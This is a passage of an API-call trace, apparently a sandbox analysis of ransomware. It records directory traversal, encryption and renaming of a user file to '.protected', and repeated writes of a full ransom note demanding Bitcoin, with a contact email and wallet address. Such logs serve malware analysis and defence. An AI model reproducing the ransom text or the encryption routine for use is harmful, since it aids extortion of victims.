Files") returned -1 [0090.179] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.179] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.179] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.179] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\.") returned 96 [0090.179] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.179] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.179] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.179] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.179] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.179] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.179] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.179] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\..") returned 97 [0090.179] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.179] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.179] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0090.179] lstrcmpiW (lpString1="rasphone.pbk", lpString2="Windows") returned -1 [0090.179] lstrcmpiW (lpString1="rasphone.pbk", lpString2="Program Files") returned 1 [0090.179] lstrcmpiW (lpString1="rasphone.pbk", lpString2="Program Files (x86)") returned 1 [0090.179] lstrcmpiW (lpString1="rasphone.pbk", lpString2="$Recycle.bin") returned 1 [0090.179] lstrcmpiW (lpString1="rasphone.pbk", lpString2="System Volume Information") returned -1 [0090.179] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned 107 [0090.179] StrStrIW (lpFirst="rasphone.pbk", lpSrch=".protected") returned 0x0 [0090.179] lstrcmpW (lpString1="rasphone.pbk", lpString2="RESTORE_FILES.txt") returned -1 [0090.179] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0090.179] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0090.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\rasphone.pbk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0090.180] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned 107 [0090.180] StrStrW (lpFirst="rasphone.pbk", lpSrch=".txt") returned 0x0 [0090.180] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned 107 [0090.180] StrStrW (lpFirst="rasphone.pbk", lpSrch=".rar") returned 0x0 [0090.180] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned 107 [0090.180] StrStrW (lpFirst="rasphone.pbk", lpSrch=".zip") returned 0x0 [0090.180] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0090.180] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.180] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0090.180] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.180] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0090.181] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0090.181] CloseHandle (hObject=0x158) returned 1 [0090.181] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk.protected") returned 117 [0090.181] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\rasphone.pbk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\rasphone.pbk.protected")) returned 1 [0090.182] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0090.182] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0090.182] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\RESTORE_FILES.txt") returned 112 [0090.182] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.182] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.182] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0090.183] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.183] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.183] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.183] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0090.183] CloseHandle (hObject=0x154) returned 1 [0090.183] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0090.183] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0090.183] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\RESTORE_FILES.txt") returned 101 [0090.183] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.183] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.183] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0090.184] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.184] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0090.184] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.184] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0090.184] CloseHandle (hObject=0x150) returned 1 [0090.184] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0090.184] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0090.184] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\RESTORE_FILES.txt") returned 97 [0090.184] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.185] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.185] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0090.186] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.186] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.186] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.186] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0090.186] CloseHandle (hObject=0x14c) returned 1 [0090.187] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.187] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.187] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\RESTORE_FILES.txt") returned 85 [0090.187] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.188] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.188] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.189] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.189] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.189] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.189] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0090.189] CloseHandle (hObject=0xd8) returned 1 [0090.189] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.189] lstrcmpiW (lpString1="Office", lpString2="Windows") returned -1 [0090.189] lstrcmpiW (lpString1="Office", lpString2="Program Files") returned -1 [0090.189] lstrcmpiW (lpString1="Office", lpString2="Program Files (x86)") returned -1 [0090.189] lstrcmpiW (lpString1="Office", lpString2="$Recycle.bin") returned 1 [0090.189] lstrcmpiW (lpString1="Office", lpString2="System Volume Information") returned -1 [0090.189] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office") returned 66 [0090.189] lstrcmpW (lpString1="Office", lpString2=".") returned 1 [0090.189] lstrcmpW (lpString1="Office", lpString2="..") returned 1 [0090.189] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\*") returned 68 [0090.189] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.196] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.196] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.196] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.196] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.196] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.196] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\.") returned 68 [0090.196] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.196] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.196] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.196] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.196] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.196] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.196] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.196] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\..") returned 69 [0090.196] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.196] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.196] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.196] lstrcmpiW (lpString1="MSO1033.acl", lpString2="Windows") returned -1 [0090.196] lstrcmpiW (lpString1="MSO1033.acl", lpString2="Program Files") returned -1 [0090.196] lstrcmpiW (lpString1="MSO1033.acl", lpString2="Program Files (x86)") returned -1 [0090.196] lstrcmpiW (lpString1="MSO1033.acl", lpString2="$Recycle.bin") returned 1 [0090.196] lstrcmpiW (lpString1="MSO1033.acl", lpString2="System Volume Information") returned -1 [0090.196] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: 